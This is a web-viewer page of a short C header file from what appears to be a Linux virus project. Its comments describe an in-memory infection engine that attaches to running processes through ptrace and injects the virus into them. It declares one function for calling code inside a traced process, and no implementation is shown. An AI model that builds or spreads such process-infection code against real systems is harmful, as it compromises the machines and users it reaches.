summaryrefslogtreecommitdiff
path: root/other/wrez/inmem.h
blob: b9eacd8a03952bb6800f025f973e6d05d8c6bbe2 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/* inmem.c - in-memory runtime infection engine
 *
 * this module provide the capability to attach to other running processes
 * through the 'ptrace' debug interface on linux/x86. it provides abstracted
 * functions to call functions within the attached process and to infect the
 * runtime image of the process with the entire virus in a safe way. it is
 * optimized for a minimum of context switches, so infection does not delay
 * normal execution.
 */

#ifndef	INMEM_H
#define	INMEM_H


/* inm_call
 *
 * obtain the address of function `func' in already traced process referenced
 * by `pid' and call with parameter frame `args', which is `args_count' words
 * long. when `retval' is non-NULL, store return value of function call in it.
 * will clobber pf_ptrace's static frame.
 *
 * XXX: the process `pid' has to be in stopped state with us already having
 *      waitpid'ed on it, else this function might run into serious blocking
 *      or ptrace-misbehave issues.
 *
 * return 0 on success
 * return != 0 on failure
 */

int inm_call (int pid, char *func, unsigned int *args,
	unsigned int args_count, unsigned int *retval);


#endif